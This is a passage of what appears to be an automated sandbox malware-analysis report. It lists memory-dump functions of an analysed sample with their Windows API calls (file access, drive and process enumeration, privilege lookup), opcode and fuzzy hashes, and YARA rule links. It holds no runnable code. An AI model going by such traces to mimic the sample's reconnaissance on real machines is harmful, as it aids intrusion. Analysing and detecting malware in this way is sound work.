                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 5e1a09046662ea6e8766f960c20b54d01a319cf81a7c10bfdb862135a6bac436
                                                    • Instruction ID: 85d39960809a13a198f50ee043071fdd16773783ab9403b90d60bf0a4182b157
                                                    • Opcode Fuzzy Hash: 5e1a09046662ea6e8766f960c20b54d01a319cf81a7c10bfdb862135a6bac436
                                                    • Instruction Fuzzy Hash: 202160716053809FE722CF25DC84B52BFE8EF46214F0884AAED49CB293D365E404DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: dd97f91a4225bbe1a0fc7571a307442c1e29897d90968afa211f00692956deb2
                                                    • Instruction ID: f3fdae390ca409474dc88616f0e862cf6a2461bf1ef4c2ffce55ac504ad042bf
                                                    • Opcode Fuzzy Hash: dd97f91a4225bbe1a0fc7571a307442c1e29897d90968afa211f00692956deb2
                                                    • Instruction Fuzzy Hash: CC2192725093C09FEB128B25DC55B92BFF4EF07210F0984DAED858F163D2649908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 028D1148
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: ae71d848cda1a3e88b9bc729674eda7be28a5980af9fc04e8b21400034c13533
                                                    • Instruction ID: 2fb73ab0ce2fdc6ceab1270354e98a1f7ee0cbfc0c32ff381ceeaeb08f559773
                                                    • Opcode Fuzzy Hash: ae71d848cda1a3e88b9bc729674eda7be28a5980af9fc04e8b21400034c13533
                                                    • Instruction Fuzzy Hash: 4B216D6540D3C49FD7138B259C54A62BFB4EF57620F0980DBE8888F2A3D2695909D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: ace965650c9af1e7a149643b47c582d3d4114e0bdcc20a2ee31f2c8dc1122eab
                                                    • Instruction ID: 4ad4483f53b01b47a43f32d183dfb7b0ab4d10fc44efbd3c66b458be9714b9ee
                                                    • Opcode Fuzzy Hash: ace965650c9af1e7a149643b47c582d3d4114e0bdcc20a2ee31f2c8dc1122eab
                                                    • Instruction Fuzzy Hash: D211BF72600300EFFB21DF55DC85FAAFBE8EF44720F14846AF9098A281D671A904DBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 028D08E5
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 92db6ee929ad850f0e698071b47f5c639e8758dbb3c20ea2a1b69ef64fa49875
                                                    • Instruction ID: a24c7578c76ffcf22c3b2432f75aba3f09d56d825e710af7d95b2c5ecff7adb2
                                                    • Opcode Fuzzy Hash: 92db6ee929ad850f0e698071b47f5c639e8758dbb3c20ea2a1b69ef64fa49875
                                                    • Instruction Fuzzy Hash: B611BC7A400304EFEB21CF51DC85FAAFBA8EF14721F14856AE9499A241D671A908CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0200BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: db8c954e20cbd7cca4dd817f22d25ed340e2ca9cd03909aff7e4d7aefda0bb31
                                                    • Instruction ID: 10cb3933de03d3beb9d4a7ac90e14c64cc7aba9777772419f7d187bed1248226
                                                    • Opcode Fuzzy Hash: db8c954e20cbd7cca4dd817f22d25ed340e2ca9cd03909aff7e4d7aefda0bb31
                                                    • Instruction Fuzzy Hash: 1D11A272504384AFEB22CF65CC84B52FFF4EF06210F08849EE9898B662D375E418DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 028D132F
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: e6bee4d7da1aad9a3c5dfc1e534eb4d2935f1752451d2a96fd37e28515788d80
                                                    • Instruction ID: a0f6297d9d91a623613f422fe3447e24248c0b7f81c598993cdd83cdd5d66025
                                                    • Opcode Fuzzy Hash: e6bee4d7da1aad9a3c5dfc1e534eb4d2935f1752451d2a96fd37e28515788d80
                                                    • Instruction Fuzzy Hash: A411C1755083849FDB118F25DC49B96FFE4EF06220F0884EEED498B252D239A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 5af8a02d0a6d93ec14a1227e850d250d2b125943d994e13d482f3a3a225f93a5
                                                    • Instruction ID: 94916c54e05df432edbc7a2495de6839cc5b956008c2ec579bd728d5ca6d830e
                                                    • Opcode Fuzzy Hash: 5af8a02d0a6d93ec14a1227e850d250d2b125943d994e13d482f3a3a225f93a5
                                                    • Instruction Fuzzy Hash: 6F114F715093C49FE7128B25DC94B62BFB4DF47624F0880DAEDC54F253D265A908DB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 028D0640
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 891400c7f721034662da14feb410c8e2ec821ea0fe9e50d90f891e7f57cc0570
                                                    • Instruction ID: 1e568b41d4dcd263d0dc2bf1376f07fee7c0c81b0c92c3c6262391d357c21b1d
                                                    • Opcode Fuzzy Hash: 891400c7f721034662da14feb410c8e2ec821ea0fe9e50d90f891e7f57cc0570
                                                    • Instruction Fuzzy Hash: C511C6755093C09FD7128B15DC55B52FFB4DF42224F0880DBED898B653D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 028D099C
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: c540a34a9edda5b49a723ab3fcf5362d93bfd19879ef018e6efac4f65a2b01a5
                                                    • Instruction ID: 4fa3f909d570363ef1af5f283367fa523ae4566af1faada5196f2ac15cbaedce
                                                    • Opcode Fuzzy Hash: c540a34a9edda5b49a723ab3fcf5362d93bfd19879ef018e6efac4f65a2b01a5
                                                    • Instruction Fuzzy Hash: 1C11BF754093C49FE712CB25DC55B92FFB4EF07324F0980DAED888B263D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0200AA71
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 33f3c58053d2abc36094a7752bed6b40260f3efa083473062966a07c7e4651f0
                                                    • Instruction ID: 221babc35c05068469b5f3f00848616f8ac68bd698a9724bdc523d9371914dc4
                                                    • Opcode Fuzzy Hash: 33f3c58053d2abc36094a7752bed6b40260f3efa083473062966a07c7e4651f0
                                                    • Instruction Fuzzy Hash: 3B11C17550D7C09FE7128B21DC85B92BFA0EF03224F0980DBDD858F1A3D269A909D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0200AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 4ee37d0190b3439f5fcfbd1da2893c54f1e97b9fe7853b3aa3c0af17fad4c1cb
                                                    • Instruction ID: cbe2d372782fd55e41c1b992c8ffc8acb0cd71722f3497fef5592f39bbfec418
                                                    • Opcode Fuzzy Hash: 4ee37d0190b3439f5fcfbd1da2893c54f1e97b9fe7853b3aa3c0af17fad4c1cb
                                                    • Instruction Fuzzy Hash: D5115EB26007009FFB61DF25DC85B56FBE8EB05621F08846AED09CB682D775E504DA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 028D0819
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: ddb29d3800e57bab770cf8dfa0474973ed448431b72720a731e1479619a5ceda
                                                    • Instruction ID: 5d9a4cce6506480707146cbf06ef2e79b4d89cda31f7244a3b8e7584406872af
                                                    • Opcode Fuzzy Hash: ddb29d3800e57bab770cf8dfa0474973ed448431b72720a731e1479619a5ceda
                                                    • Instruction Fuzzy Hash: A0018079540704EFFB20DF15DC85BA6FB98DF44725F14809AFD099A241D674A908CAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 48ecf6e21d33d23aac01956fc15b2a557a77fb91b3ab94d352213cb18f35db0a
                                                    • Instruction ID: d4ae1d105e7c734dfb95a3a33e5b24b6476b37dd4e5e2fcabb98f6d3f1296c17
                                                    • Opcode Fuzzy Hash: 48ecf6e21d33d23aac01956fc15b2a557a77fb91b3ab94d352213cb18f35db0a
                                                    • Instruction Fuzzy Hash: 6F118B7A500700DFEB20CF56EC89B66FBA5EF04620F08C4AAED49CB652D775E408CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0200ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 2b28e38c01cca75af3be523d72f90a6cfa43af2ef8816b3fd67dadd458fc4519
                                                    • Instruction ID: 3813185168e4bcece7849318e06ef186be95410a7bbd2033003320195008ada9
                                                    • Opcode Fuzzy Hash: 2b28e38c01cca75af3be523d72f90a6cfa43af2ef8816b3fd67dadd458fc4519
                                                    • Instruction Fuzzy Hash: A41182B55093809FEB11CF65DC85B92BFE4EF42324F0984ABED498F153D275A508CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0200BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: ee7f5c8aaee47e4868fa954bc6893a9d4431e200ac8d34bebe323962cab10dbf
                                                    • Instruction ID: 9fe415a9cf395201593dd08d8611e1afcfef47a79a7c44e11dbf0a04165873aa
                                                    • Opcode Fuzzy Hash: ee7f5c8aaee47e4868fa954bc6893a9d4431e200ac8d34bebe323962cab10dbf
                                                    • Instruction Fuzzy Hash: 0111AD72504704DFFB21CF56DC84B66FBE4EF09324F0884AAED898A652D371E414EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028D01D0
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 3ec2aedf24625301ec6d3c12d8131a9a205774abd8c43a7761528d8fc5184a5f
                                                    • Instruction ID: 7d35ee7c6fd6b09f3607edae95126c8d2a6f9ff969466a13968c687287de2768
                                                    • Opcode Fuzzy Hash: 3ec2aedf24625301ec6d3c12d8131a9a205774abd8c43a7761528d8fc5184a5f
                                                    • Instruction Fuzzy Hash: CD019E796003048FEB10DF26DC857A6FB98DB01325F0884AADC09CB642D774E408CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 028D109E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: f694e17217e1d5cd0d403dd65115796bb5992a3a12d995cf90cc74dc07c94d5f
                                                    • Instruction ID: dd008ce6f03fda6ff5d4082bf1cf10eac4bd81c5e472afcc455aa479422bd68f
                                                    • Opcode Fuzzy Hash: f694e17217e1d5cd0d403dd65115796bb5992a3a12d995cf90cc74dc07c94d5f
                                                    • Instruction Fuzzy Hash: F2017171900600ABE310DF26DC46B66FBA8FB84B20F14816AED089B741D235B515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0200A23E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: 155aa48f926b2e43b0923e2bfc4d6e14d736ac0e339fd2825cdca34bd68af92a
                                                    • Instruction ID: 19b39b862e769f4755a936d942229a697d15de19ea7c1fe833ced0a347b86e75
                                                    • Opcode Fuzzy Hash: 155aa48f926b2e43b0923e2bfc4d6e14d736ac0e339fd2825cdca34bd68af92a
                                                    • Instruction Fuzzy Hash: 4B018471900600AFE310DF26DC46B66FBE8FB84B20F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 028D132F
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 29122e3b8aa144507e587133d827cd283ef79a84e0091d1de218061034dc57e8
                                                    • Instruction ID: c3b5d3d3a68061b7ea9560882f0701d7972e3e40c0bcfdc8f5a1274f3538ec02
                                                    • Opcode Fuzzy Hash: 29122e3b8aa144507e587133d827cd283ef79a84e0091d1de218061034dc57e8
                                                    • Instruction Fuzzy Hash: 8301BC79504304DFEF108F15D8897A5FBA4EF04620F08C4AAEC0DCB642D279A508CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 6eb26cb04e6bcb28562d06e149cfa89c718570d454522ebb8720d1aade247b87
                                                    • Instruction ID: 7e9d8cb118cb5fdb9d4a75630327e8c1979638a6b32efd3051c3f547b10c2b41
                                                    • Opcode Fuzzy Hash: 6eb26cb04e6bcb28562d06e149cfa89c718570d454522ebb8720d1aade247b87
                                                    • Instruction Fuzzy Hash: 3F01BC71500300DFFB208F15DC857A9FBE4EF04624F08C4AAED098B296D2B5A904DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 028D0502
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: a8aad16d6828b8cdd39578eeecfaeb67c0c05c9a6917b7333b41c4fb445c197b
                                                    • Instruction ID: ba68ae08038cec650a8afc74c5ecddbc61cd391f3eb7cf923a09d969211a9cb6
                                                    • Opcode Fuzzy Hash: a8aad16d6828b8cdd39578eeecfaeb67c0c05c9a6917b7333b41c4fb445c197b
                                                    • Instruction Fuzzy Hash: D2016271900600ABD310DF16DC46B26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 028D0FB0
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: e71be47b63087ffebe0905434ebdd8f888fdee3d091656d2a4792db795e5ef70
                                                    • Instruction ID: 2caf40419a2c35b64370bcc44dab3d004190f4c76c73ed4f593ba7d3663d2f15
                                                    • Opcode Fuzzy Hash: e71be47b63087ffebe0905434ebdd8f888fdee3d091656d2a4792db795e5ef70
                                                    • Instruction Fuzzy Hash: 6301BC79504304CFEB20DF16D885B66FB94EB00324F1884AADC08CF686D374E408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0200A94A
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: a08e0d88f752a99dc30deacc6514e0c29147e1de637d15098f9f6e7216b84131
                                                    • Instruction ID: 7a37bf02202b61082465f97988caf24654ce816e79dfe1bb87a256241f1c2fc3
                                                    • Opcode Fuzzy Hash: a08e0d88f752a99dc30deacc6514e0c29147e1de637d15098f9f6e7216b84131
                                                    • Instruction Fuzzy Hash: E2018671900600ABD310DF16DC46B26FBF4FB88B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 028D0640
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: cffe795cdce73e4254f7fdf108df63eb4196840b547ecb6786f8c81da1509b85
                                                    • Instruction ID: 3a4be862c173193387d151ceec7b72ae7c520527b6cce997533680ab80f8daac
                                                    • Opcode Fuzzy Hash: cffe795cdce73e4254f7fdf108df63eb4196840b547ecb6786f8c81da1509b85
                                                    • Instruction Fuzzy Hash: 8D01F47D504704CFEB109F16E885765FBA0DF41725F08C0AAEC098B752D375E508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0200ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 54ae85dbea06934b28f0d6f8b5287278e114596825550a37bc21ea79720a2c1c
                                                    • Instruction ID: fdcaacbe0ac0b4fb210e9efd92e70d240dcc965004527592118c7e06a3112be2
                                                    • Opcode Fuzzy Hash: 54ae85dbea06934b28f0d6f8b5287278e114596825550a37bc21ea79720a2c1c
                                                    • Instruction Fuzzy Hash: AB01DC31604340CFFB20DF16DC89BA5FBE4EF00221F08C4AADE098F282D275A404CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 028D1148
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 1e490e7be242dd9cf8f68c1933cb479fa95828ea308af68dfecd7c03eac4a69d
                                                    • Instruction ID: 483fcc876a082a0e5c8934c142bf72f1d7a3df79dc488455fff94ea06d4572db
                                                    • Opcode Fuzzy Hash: 1e490e7be242dd9cf8f68c1933cb479fa95828ea308af68dfecd7c03eac4a69d
                                                    • Instruction Fuzzy Hash: A2F0F939504744DFEB20CF06D889762FBA0EF00A26F08C09ADC0C8B312D279A548CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 028D099C
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 456abd0a5d3cb0aef7bb8f3cc442817c101b6319abae68dae7d51dcb971b6b66
                                                    • Instruction ID: 8acb2309b09f8dcd90a8cddbbd155269e84ef0f5798b64a05ad506bc563d4531
                                                    • Opcode Fuzzy Hash: 456abd0a5d3cb0aef7bb8f3cc442817c101b6319abae68dae7d51dcb971b6b66
                                                    • Instruction Fuzzy Hash: FEF0CD39904744EFEB20DF06D889766FBA0EF14726F08C09ADD498B316D375A508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: c39464f561ddba9078818ced282d7e83c389fc3d43dfcd074bd18dc91769cb70
                                                    • Instruction ID: 1311215449a8ec2c5f66dcd0ea898c4cd0799724df2d953a0a621e0aeffc7783
                                                    • Opcode Fuzzy Hash: c39464f561ddba9078818ced282d7e83c389fc3d43dfcd074bd18dc91769cb70
                                                    • Instruction Fuzzy Hash: 0FF0AF35604744DFFB209F06D8C5765FBA0EF04721F08C09AEE494B352D375A504DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0200AA71
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: e007e36aac78bb5a2e11a1d29650b66b3dbb4abf0a3fc1912408221f7a16f9ee
                                                    • Instruction ID: bed6b19ae1cfaec3e9632bee7a5f692e6c869eb265e1482df264a0346d1fe5ce
                                                    • Opcode Fuzzy Hash: e007e36aac78bb5a2e11a1d29650b66b3dbb4abf0a3fc1912408221f7a16f9ee
                                                    • Instruction Fuzzy Hash: 7FF0CD31604740CFFB20CF16D9C9762FBA0EF06621F08C09ADE094B282D379A508DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0200A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 1430b6b6026f2b84a9d4c4680a29351ca61c1879fd6993c47571c8e15eb8eccd
                                                    • Instruction ID: 37ae99c886a633582a13fe06a854aed23eaaa4c2a0a1e4219d431491ca67fb68
